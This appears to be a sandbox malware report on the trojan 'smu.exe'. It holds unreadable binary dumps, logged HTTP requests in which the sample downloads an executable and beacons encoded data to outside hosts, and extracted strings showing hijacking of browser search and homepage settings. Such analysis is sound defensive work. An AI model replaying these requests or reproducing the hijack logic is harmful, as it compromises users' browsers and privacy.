.(.P..pL.s.."..8.......4&.......[o.bpoJ.."M.b1...'"J.:.(.;->.....&_
..E...#....L.Z....w.........c".....:..oT.....<....N.!.N...u..c.....
.;.|.C.......A..\.._ -X....Z...........UDC.1.D".TZ.e5.q.5..x....k>.
jDu.hk..Y.@......?.i....Fp@.>e...N..:O...15Y9.....}.uTa%...N2.>9
...[.&S.fc^.."@.....]s<...~.O.Cn5.'^...e...v.......b...m<.......
....ww._.p.u.e.61.gn ...$b"..o.....^.4#]...........t../.xi.../l@C}.I.V
...G..FB.e.....3Y.O...^y..*U..^G9..........M....T....W.L.Wn.t.~A.H9G..
.x..CW.M...n:...f....4....~.;a........,.2....z... [email protected].*....M
M.?..R.....k....*......M..w.......O...Ed.=...L.4.......A!oI.:...M..-Iy
..&.ba.i.~g#.r.F.U.r....`[email protected].?...........zF.6..3.
..K...;..ws...gM....<....8N...q..r.Y......IRW._..^...s..r...DEu(..M
.'_izYS..^..2....>..n.]...z.....).4...*JI....6.-..[...K..az[_.. '.f
..I..#[email protected].*6.5..lt....*...H..Sc...3.....&7..K...
.........2..n.......z..2(.....^..%..^...).....n.V. <..S.{p..d......
\7l....1../..H... |..=...'HEz...T.....K.zA.P(o...J.c..>.....x..G..q
...6....R.1jX.9...Q..0.J.9o..]]lT.......]^.[........./23..5w.R...l<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2500000-2749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 07 Sep 2015 16:56:59 GMT

Content-Range: bytes 2500000-2749999/3359008

Age: 1

X-Cache: Hit from cloudfront

Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: qRNT14uF92zczRha-STto9eTW8-Ob2v4PlstduXk4PnQGgKceW4YEg==
..vH..r...<..XQR.N.....O3.h.&....nS.:MT.b.$...k.!.i...%.6#...._.7".
A:...?...c.N.D....;.7..N..`..{[email protected]".....4....
./.&H.N..B...*...'..i...t...{...n@=#j..y.-...-..................JCpNR.
.8^|..%.]0..?...pg..b.S.=...2..8......)#..v....r.b^Ow.l....St.Kc..Q..p
'....=0Up4_..D..yd..Q.......a...4.4.Q.):...~b..\x.e..M..y 9.30.....`4Z
..g....C..*....f...(v_)a.5[..>...m....p.x..d#.4.Z.Cr..@.*S._.$....v
...a..B...XC.)g.7..........%k..IX.?..J`..>.c..........z.....R..3 ..
.0^....BL..{.;........ 0cc...zR.pL....-.. ..M..8....(&...So..!..R..[..
.......^..........~.e..Z.....|[:.....%<t........k6.X~2..q?aH. ../..
(.).8.._..a..:e...T7..A.U.....l..........q.."B..e.k.!%Gw..............
W..K.T...7e...T...U..6.....].so.&.^.......M.E..U.....72\-.\d$wd.......
..4..B^.....>#Zx....Y.o.2N.D.dB_.e4.Q..Y...68..*..g.0.....a...Q.k.0
6...j.x19' @.O>.'..Y.i]@...U.....dG[.p%.O............c..j..H.....
.Y*.#.N..V.......6...d.9r.........>mg.....^[email protected]....<..
...Jz..s.LS.m...J...x.M?.H.y&!H).?.. .b.<.3.A .&......H&.5-......X.
...%..w.m..s.m|).}..8d|B/.P1.;;T..2a...22.kz..0.....ve:."s..Z.YvrT..g.
.=&.....[.<-.-q.._..'Fy$\Pt.0....f....~.....V.]:....:^.UK..xw=...^.
...%{S..yr.cx...%r,.,...7..w....@.<.:.I..?.*.ca..........q.8...P?..
..-...~d......|V..>Zk.8B.0........ .'d?..[...X..N..I%...O.....&BH.b
..........d$5....Q.4BIl~1..w|....*.w..2q.-...M.....t......%......9;..u
=b.}.EE...pi.....,.0..Y.r*E.#.^....K.....\.....wa.I.....^C-,....y@oX~j
.^l"..^E.....<"..o.4.G.'.(!.H3IDx......,..V.L'W.............;W.<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=3000000-3249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 07 Sep 2015 17:05:21 GMT

Content-Range: bytes 3000000-3249999/3359008

Age: 1

X-Cache: Hit from cloudfront

Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: FOhvWczZ5di9XQKhsxL91vJ6fHVllNRxdLzlMNyQ4UWL5ZcUr94mNA==
_0Z...g..R~*. ....t.......Q!."C..*....p....I...@_.X..-.9...o.......b..
..|.......#u.E.....c.c.......G..{.m.7 .9N...z.R.h.....O.=..L7-..C.Yj..
..oo..z!. |A...p:...U.I..R?-....*>....5{.......2X.II....(L[.a....p.
1.^5;G$.O".'8 .. |...\.(..M....SW..%.y.......A$...*...6...H.:R......).
2.M-..}.kZ...M..v.;e......V=-.0.i.,.Z>..M-A..!........z.R...K..:.v.
%.fh.....)...o..e`...Xi..t....6^.Hei*y..D5.C.^..$yr.J!][email protected]
.T...7_....C.I!&.y... ...p...P..d...|....&........a..:G.k.`0....?..5..
[email protected]..}..'...Uk.<02.r...[...=.([email protected].
T?G...? V..}~y....'{[email protected]...%'...#L..l.f_
oN..;.&.?D.c[..*> &..t..q....RU1.gn...5.Yn.1...R..;'..."..i..=.9...
.&..0..;.d..w).Y2>u..-ID....4..Br<..0...\z.D1......:..../..{..g.
..t..zt.7....;.'..k.q...._..O.\a:8..Xv.........U&...XgrX..t&Q...I @V.e
d.RR.c0.).,........e)$vf..n..1.V..*...0.Q....(.F..,... t..........u}..
....0......7}>..2.....3|[FE.C....."..0...l...Lv5..f..8u...D.....^.-
a.....V...!...EW-..,..W[.L....A.\..yaq.....,..@J.!..ZP(.....z.($..]...
.........#..y....~K..'..>WC..0.J.....o.5.l.......0o.s.H3..<'.:..
..T{8p..']Sp.....T.....L.q.I..7.h.y.jp.c.;I........&L6./.)4'{.../t..Je
.r......o'.o.hu.....)0..........y..e..... R......~."w.y.....#..1.Y....
].z....im.......G-....N...3^..oL.../...%`.@jt...>6Td0,K........E...
..i......Q......9..;.A..u...z.8.p?..*...D.H...x./.......7...U%G..YI.v.
%.o/.d.x.j.".e..$2........l......>.aeG.y1.4.......Y..m..{NC.....&).
.......tY.....?......HDd.{k..<...l;..vtg..H5.....D..c.....l..(.<<< skipped >>>

GET /12466.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiORMU9nX4kNMjBc8MQwUMZZmrFmLJ4RM0tNH56RfInM z4gguKWlYXah KANE5N7oCaDOhvvrNRpfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXx3vXLYf4jjaIEVoAOs9O8bGj60wCyTOP HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:53 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

GET /t.ashx?e=LCnUzM5l8JKBkxMrsxJdJjRFyso9cgVYMKeV1roKInbCigHpURgZK3sc7hbJtTJH20qHT6WNWM6mY5NIfEeUIuhJ2EFls9mhQI32H5tXX1VKXe7b3ey81Z7hCmg7VZxoKYX3Ti/i3YOG9SIsJmG3UfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMdF2wYySv2jl HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: qko863p80c-mzxspesu.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:40 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

abfgshdgfjhsk....

GET /t.ashx?e=LCnUzM5l8JKBkxMrsxJdJjRFyso9cgVYMKeV1roKInbCigHpURgZK3sc7hbJtTJH20qHT6WNWM6mY5NIfEeUIuhJ2EFls9mhQI32H5tXX1VKXe7b3ey81Z7hCmg7VZxoKYX3Ti/i3YOG9SIsJmG3UfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMdF2wYySv2jl HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: qko863p80c-mzxspesu.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:41 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

abfgshdgfjhsk....

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: qko863p80c-mzxspesu.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:41 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

abfgshdgfjhskHTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:41 GMT..Con
tent-Type: text/html; charset=utf-8..Content-Length: 13..Connection: k
eep-alive..Cache-Control: private,no-cache, no-store..X-AspNet-Version
: 2.0.50727..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X-Cache:
 MISS..abfgshdgfjhsk..

GET /12466.ashx?e=LCnUzM5l8JKBkxMrsxJdJjRFyso9cgVYMKeV1roKInbCigHpURgZK3sc7hbJtTJH20qHT6WNWM6mY5NIfEeUIuhJ2EFls9mhQI32H5tXX1XUaDgXp2QHNdR8GDCHWpWt6/KwEvQjAfCESiW wqgeJJNlRzoCiiPdLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBxuiooWaRoAJw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:37 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /12466.ashx?e=K24uUiBczqdmS6nlSU/NTrtoX8KCsVAM/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGSoNjFwE9Y5NLhu0b45kiT yMyEnHNejvIwWNawbTP05KYX3Ti/i3YObVFZJeaqFdk1VfCEU0AOklTie0zE 5RJfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXx3vXLYf4jjaIEVoAOs9O8bGj60wCyTOP HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:38 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /12466.ashx?e=iAb9K1DDBHUinMwQKODRlCD/q4eoirb7IM0CqmsRfbtxTYwWxYG9WEEY41XBMtFk/h9mchShIbTzFrgVq4jsEiR1q1S/V1rzDyhRDL0PLalNTvXaKqGxaNCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:38 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:38 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

The Trojan connects to the servers at the folowing location(s):

smu.exe_2964:

.text

`.rdata

@.data

.rsrc

@.reloc

[email protected]

<:%u4

t8Ht.HHt#

F2t%f

#t.Ht

 2 34 567

j.Yf;

_tcPVj@

.PjRW

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

0123456789-

%b %d %H : %M : %S %Y

%m / %d / %y

%I : %M : %S %p

%d / %m / %y

operator

GetProcessWindowStation

?456789:;<=

!"#$%&'()* ,-./0123

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

1.2.3

SQLite format 3

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY

CREATE TABLE sqlite_master(

sql text

3.7.2

CREATE TEMP TABLE sqlite_temp_master(

208.69.150.250

208.69.150.252

8.8.8.8

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

Catcher.ProcessId:

Catcher.Path:

Watcher.Filter:

2.3.12.1634

smu.exe

Chrome

Report.xml

/Url:

Report factory:

Update.xml

URLSet

Report

homeURL

suggestURL

newTabURL

ieSearchURL

chSearchURL

ffSearchURL

opSearchURL

chromeKeyword

[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]

vup.tmp

Argument.CheckResult:

Argument.IsRunning:

Delivery of report succeeded. TaskId:

Delivery of report failed.

SHDeleteKeyW

RegDeleteKeyExA

RegDeleteKeyExW

CCCzdef1,11111111-1111-1111-1111-111111111111

NtQueryKey

1.3.6.1.4.1.311.2.1.12

urls

ERROR: %s

SELECT * FROM urls

WebData path:

favicon_url

keyword

originating_url

suggest_url

keywords

keyword LIKE '

WHERE key = 'Default Search Provider ID'

key = 'Default Search Provider ID'

DELETE from keywords WHERE id =

search_url

icon_url

startup_urls

chrome_url_overrides

urls_to_restore_on_startup

www-searching.com

template_url_data

image_url_post_params

instant_url

instant_url_post_params

search_terms_replacement_key

new_tab_url

search_url_post_params

suggestions_url

suggestions_url_post_params

chrome_settings_overrides

session.startup_urls

web_url

search_icon.png

&#xX;

</%s>

%s="%s"

%s='%s'

<![CDATA[%s]]>

<!--%s-->

version="%s"

encoding="%s"

standalone="%s"

Snapshot.xml

MozillaFirefox

GoogleChrome

AboutTabsUrl

HomePageUrl

DefaultProviderKeyword

UrlsToRestoreOnStartup

StartupHomepageUrl

Chrome propagate flags:

Firefox propagate flags:

ParentKey:

rDz2oLrxEd7tqorlxPHCSbpkVt/bZZuclcedjgvjrx5tDx7XnfZQjbd9WRhEjQzrKQBL lchgPpw2joBB IwFAu5RW4JcZP3S5Jm3QM9klwivxpzRjh9 jFGeuCwg7fa/HM15lK3jTHXUjVPnIEadpmY4jv7ywlegYHRQyc7xc1XcTe2TccuzmMaLo68YiE5vPkmCDlASCbtMpHFeFcupx0t7OgkYmbDHAwQlgu djTn6nQfC1xHBcRL7fYjaJ2ad6dGOUZAsbHeIpUSp4nxGHOmvAL06vqJh3DTzsSO7EPDVz0yD8gc QDljr2BUAvuNQBfQLANtmT37rJ0C7hqUSVg1mD68 CZrHjd1CeJmHamAXlseJPSnm KFnG/1c coF3P58SUT r/DM6745nlDqpqg2fjiUstyu69sMwUOFgbB6/PgPG0VAckChf Pylb9b7DIN1HCdWS  O3BxhtsiIkpaPOUuahRNtoT4DpvGf1R SjMvvia f1Tk4EbUjpkeT/SHrpFL/1Bygwwpd0nFaFLRdhAD34FQkAPT/sP2Yq0DvG5FczLuhzkVhxYkkcNsdHIIn4Pj7VwA1dYGg6YME6txpWMi6IsUM7JtNamFSHj5S3RyMY2HkpWlnehRIEWOU8rufd/8NxdxEh4hGldz9z6FDkN13F9KpCCJD8p6gHgIHi46nRIyLhtzHs/FWgpIBScgh4 iUXE2ilHKH TRuonsl8u6HjwFVtlL8PW/lp7SBs9wnHQwEYX2vppXvwar4qeOKyNcGnOSf7FYTwmHhsc3yvZmCUslXEwpIEruKGRieVqJvUb9SQdo04iRwEkfTsVeERRWKuoAw/ttnJlJhzCghYsBqKYx1GlhZbZo9QDMXkGhZfJvEzr2MoBfZ9IleeloO2xfLoM74nC0dxiWyC TXMw9k6pY NY534Wmh Y12vy1sB3oX4EMJycv8h/bDGNdfdCNKPTvOdX6bbP cU6Tgq9ZzAbXeb7DvI4iRxfch63IFn6sz55sw6K2WVADtytAT0LQ0z5I5lEeaBbuysREfZQZl9GUs6cncIdRRsJOWk0C7LrrCvmdUvmm6wCSPhteAIrMvwtOjxBits2XlplkTxaJMfOLcgBrigpnJq1oHslokry4IzFwOof70pLBoR BvjOV3j7UWo9 dCNhbDBvLmNnPEuBRlH0rJEQNQ7E1uLC7RQ/bHIOjGxIG267/iQ3QpvhLBc3HhWgw4zXBntyzc1TsWFRzYDAG z4XsjeXqTBj5jX/1Z6MGyvYxYlVgcxFtQXZphihfRO4TFYmInczbFheMg6g7L2gAbu/bQftTSM3Gk9h1TZvO753sFgpAu5HpzAB nwdqTgSdjFxVQYmLxtAxtGyoMBo1SY3w2Yt6ZBhjvfAFmMg9W7Quiex4rwUPY2phen8AwEaM3QV4ELy/Rwz2G8E8gRj1QMYCaZcewRIj S1rQtxx8FGCU svnd bqHqA9lOq52fOkjdu2ALbbk rd1BPpBdvwY6giLkGVBZkNaxzifKFbMWqFp1f4YcINMpvHONCm4msq2 EbUu4ouR/hFrYkKlZf97yzsy 76BSgPhqxdJuY02GjlcZGNGJBwUSnjxB8jKxC1gOzFVxPL W7nVU QXQ5HrHtflvF4G4NoWAC vtp9a22bq ULuTu1f9LA7aAe0KPRL5RjaHDbveVCYCRm0QcIYjvND1OZbSxHBHVjukFmCdvdbqjiduWpgFtPly96JlJFDeDF/2iVnCEjyiRxvRoY2a/vPYSqcsyhyDwgne/PDbCLW9iU0F1Yma7ADBunbsZFYklmUaLAn kdzmm5dHz8WEcYotx5fiMIAFvTNNkJKk3l7gctXoMwa61 8hcgH1IAfMZgMBE8M5FhEPn8UDmWiw vZccVn1BaNIVuTXA/g3TXWtw61tlvIz742S7f0dAw1Z2tvGQP0kT9 XdJj1 5pY8GHmSMRJb3SOB0TIDbnP7k3zz3x8bNcre0XZ2GwIZBRs68rmk/Jzn7u45EkfvXmFejM5qKNqLOj5Cpku6Avi54Uuq6iG6/lMzVthlWWyMyz9WnbrUvgA8//ed60WWAg2ADOaopG6S4r8B02JHwdn8ZNEQn5Iku3Y0vnc9zwCmuEeU5aL783crzK Rqt7mZffHAaDfnuWcfmLDrgGQjz/EorwYyG7N7bno/I3RF8S0ULuJfosVFOikILFxZbyk4MyiLqoYWOIBJiIjmG7sSPmNuTv0U9MGH1cWIFnSok1FmWfXK9SyQ8j3 UOYPGtQW1mTjauPg1NnRGsxGe1tXhnLcIlpK/QWjs8jCBJ6Dx0k21TFFIG6hx5gNXRYrUw abeKMzLXvwOLz6jqtbZjZhTbI2dQGartWNchdsO6WigCO8MA1AmO5EPCynaeMIiebrn2vtdI wEM0MWez orMF0j O8YRhxP6uZG9JO0us6H5dQva4TL1j5RN/NG4DlC/mfJcT4hfAhUZxzX9VEBuW Ixx0w8HtS3YAkSYtwYqUB08DXihh2EQn UdNM2vWd8DUR7Jfs8VGPJefn7C2XoDnhLXBmUtfDIdSopov9LF9Irss5U9wE39MOEmQK  XF0LYFm0MNlncLepcPBaqDNn48oKlgc XEjFn3kC uqIrsc/BkTOX50BFnyuQe/3t4JyifK24T3JlHhYLrN7U8XHnQGTmbX6Jmbab1d3hGxeAPXGPc/TBlWuRlOQo7E7 /SZJAxGZ13KUIMI65CsftoTkctXMRMRvMLNtmDAFZ6RC5awFmJUuH0k5NoF3r1ITFyR9BSKENVR0xFcKahmqnkmvh22OpYVJythHgVTHY6kSK69Wxvp5GIVJe8FOiHoa1UaWXXpMH u6H8fyJqDzkPTk4bMJr0IqzruXXy4C lMp02Ta1EZqZ4LEM25YEVMSP42bwFEHVjqi 1KbaTt5ZEl3glyMulqCMOS9t04Dcz qamgzM26muS4RFZspdV4 ZRsbxwI0tglrh7o/Qt04Z7Ud0Vlf5nzBmb8GVMqcdTdlTJlThMD TfzbXNqmFGUyFXgTtXTKHNln2ILeEZCJFm13cKJ8I77diH1xOofJUvwGBQyZ1tIp9ToOLVGipJZh ybUpHwIQERilwFpdgVjM96ljLZqdSUPHobSxccFA7qXwII5N/NavtVegmtsDZ3Vo9NiuF41qR8e04/s8zGXWxxZxdCKIg3Lxkanfp3I018i94k9uGFuJzCW3ENiQ95f701b8dT7P25xUx6yVVFzd5rrgfnPdCMd0W44kPSSfFnHDvagDcn3hVLuDoqYEt279k61Hye0rlDa55DR00uXjBMcBnrym3xcjjCP92N1a BZv2prBLuBK36rY2JLW9caOGvN0AwQ8jrsJXCy/P2iGpnxGOZMbCymjIWxGVfdo7tRnDOTapJijHeYIs0ocqxz4qoAQ0V8KhaOoSJvaeEfT1ny1ajPnB5RSKfjqUlnAJZRZJsb8jYjEVetQbc1Z/Gxy3Q9btkNAIY1vr7qpb2/GPPkLxbPsab2yYXgqSp58NbJq1GT90 l0DHsLtutKaghoK7u8P 1YFF 7ECmqGGmAa2QumuSogAt8C7OCWkRoc239Wa9moXVUEBtSPDRCF1vrEpnmVb uE2K0x2kpyLTnzwLpaiH4ItiS ARDt9c2aA9RLxUkGWVb toybApu0o5XTjtFVrUALaTJ5y5fOXzy8hrbH81/IOMV0MgUd5dKJFHMH /dnVvrV mRxybjFvB95B3VZHLZsBYhCwi1ubOUqntHspciiwnlNPhyqAoU2YgOqqH UAJ9fFS83GiYZte2egV2EoZFWF7KZm8NHKIB3odjjU1eK4sNBiseSi5OH/N2CrEzAbi9Z5ovbepTpn4e6jiQMbH0o6dh2ylMhmpiJeV4MSodV7yH0J4aY5WEU/HThGaYSIrfEIfl3Y8OqV/EDPWm3pHwFUKoxXI4hxkx2TGxZKx3gByInRwYSSbSarZgS2ZENN1jIhYCL/zt8FinlhiMsLZXi BaF61dxA 4T4skKuMyffuoveNe1EidkpbVubUN9B9jCP5BU8Z3uHPpCBLbArzcpW6Mf wCC/QM7b4/GvAcgRHN3BCajQoRDuw9T8F4EpJgzyDBZBiwxfio6cAV9IQE9N8vkUcTvb7tjOnNNlt4jHur2ggmlygIg74SSorD5KQYtulF1GtLjEfc7r yM641jR2b6tQXK3dhBBeUlH811h0KVf6QFwSrqXmE5fa0MlelImv36InIwkcADTxVZ5fVvIQQVqsH1xWZTWikdcNBLtlpBujGUQufGv7W7VlWohRdBOpyyhsnpPKojvjQDEwTUn8MknS2mbvNguCCUvc4JbP/Gl3NeOOzoA4lcVmIrzgHW85v4J I3 b0AK299i8hkt uNHhxu830uVufOUTMSwR4GrrPJ8FoTfqPVLvI0/Y3PF1LLU1XM TVF83IMrHvl8n73btcFeS0DttowqnBUtKN9Jun/voeLMe1g9vZ9 FtXTkxZkgwo9S0f3bx1m1QygaRLnV9akWR6HEJ1xA3lcNCTi8GAWRd5IiOWTGWQz1XS055V6LvFiYMO11Bl48PYy7E5OAI2ESPVcznylZrtGhDmvprOqGd8oxYJzKwhGCwC8pnE2McKjsW2xpfD T9hBm/t8oyGvcmke8Q4EkFtbm7gbezN0I1S8B94 dWz9/m6V7AipZ9jR/FpIA XX5lT1CeQPd5 lBP2OYJkEPxHrxDaeBwNT3hEf5Ov yIJWKxbjMbcGK73GIXxwewdRVbBEee8e8Sm4euvIhO xNjQXmEd0Wn4f7e1 xHH1jpW1ObVWgKNGBUHlpIcw26SSGBdlM4qKzDKglTaj6aLg6s0UkXyGfqxPvW9rhhCWvujpEVgB5053CSbqy1ucw2l/G5Tyurk9KILPl 9mbszv86xmhBAFKqkSRf0RGq7mdOxDeKp ZWALgfbQpEAHE/wI3HCI7jG5tZbcfXIqPccGYKXdMsDJtPVFhkarxbZhWdlrZwpdUkjdHBgdnB8u0dXcR3RJKFd FIkhCY5DBOBGgNO5qhAc5Wd9AdrhbARpylrHznSEqJFU4SXEQiEEM2PGQHvmAzrfp9FdnnsXr J 5L4W6MxMFWIYDoxxRC1pfmMUtO3XQuEMeHkPHXj/7CPo8VXVzqBGhfo0g6lZCJW3572COYrDJGjiiGVDTt3lqVfwFE3wl7/nO5gy/oOnzjolGLMRsVv3UxIKY7wSRUI8VNwYmDhecqIeTowvWvm3Ogh52LIUf4H nQqb4QahUECz/jDEAYXJ0FNRzzqjsDehVf0dDn8qeajbqzopUccqQ7/s3so0CxYkDSO01CzoNe sS4OE8E/trLqK9aLDgfeXz2qd/4NI4raydy6Xg0vGBxhJeJVgG4tZRZCS74FWnpzUW4cTiJ7VwFPmVCGBGLdyqCXd5jh0cbL9p3BHDpIrPBXwE3G/SybQCKXWweqXBwX5airKzE3DgpqGwQ fNzV2IozfuNhvHkZqtVenBKVHSZBfTu92bi1WAbUO1gH4cDwRFjht6eq39e ewC/86Z7GWfW21naMOVH 6MSsfgXatGqmVHkc0RkG/HfqZxNJiOu//jOQ5pn1jezANGNjuCB25JKd5EgyYkQoaMXbzczP7NEPhVwCubR194OmKE5LOFyDE3iUKHozwPLenrObAB/MjkvKQjL6hrxfzT4PsY9IeglAFOW59163YDRdd/En8UMaO XQeiNzXcXjLVOZUgAofh9a5 ncBbOAi5kq4AOdTrV5sryxFxdsOLLl0HGcxGTjRAIfrBnlYPLdx1GoTBeF3/X2QS0qwjnP4bK77CDJuZhDXyeM6lEDC c2hDG5BcTBk EMmDj2Bp7yGDKpdcb3wWCa2Bb a5tYl8TJM6oArCnqPEiwr5CcwPYnPThgsNrA2r/ub6ETp6j8uiNOZZndiQkGI9Vp aTUhM lWAojBLlyZVUQr72wlMCrs3blNi794bkhcPvqrwWU=

2, 3, 12, 1634

Envelop.xml

UrlSet

Configuration.xml

Opera

StartPageUrl

AboutTabUrl

SearchScopeUrl

SearchScopeIconUrl

SearchScopeSuggestUrl

DefaultProviderSearchUrl

DefaultProviderIconUrl

DefaultProviderSuggestUrl

SearchPluginUrl

SearchPluginSuggestionUrl

TabPageUrl

SearchEngineFaviconUrl

SearchEngineSuggestionUrl

SearchEngineSearchUrl

SearchEngineKeyword

System.xml

Reset-2.1.0.7

ReportUrl

UpdateUrl

ReportDlls

User.xml

Argument.Snapshot:

Argument.GeneralConfig:

Argument.Flags:

Argument.StartPage:

Argument.Autosearch:

Argument.NewTabPageShow:

Argument.SearchScopeId:

Argument.Tabs:

select count(*) from sqlite_master where type = 'table' and name = '

%d-%m-%Y %H:%M, %a

unable to close due to unfinished backup operation

SQL logic error or missing database

large file support is disabled

unknown database: %s

no such vfs: %s

misuse at line %d of [%.10s]

database corruption at line %d of [%.10s]

cannot open file at line %d of [%.10s]

SQLITE_

d-d-d d:d:d

d-d-d

d:d:d

failed memory resize %u to %u bytes

failed to allocate %u bytes of memory

API call with %s database connection pointer

922337203685477580

RowKey

%s-shm

OsError 0x%x (%u)

%s\etilqs_

Recovered %d frames from WAL file %s

2nd reference to page %d

invalid page number %d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

Failed to read ptrmap key=%d

failed to get page %d

%d of %d pages missing from overflow list starting at %d

Page %d:

freelist leaf count too big on page %d

btreeInitPage() returns error code %d

unable to get the page. error code=%d

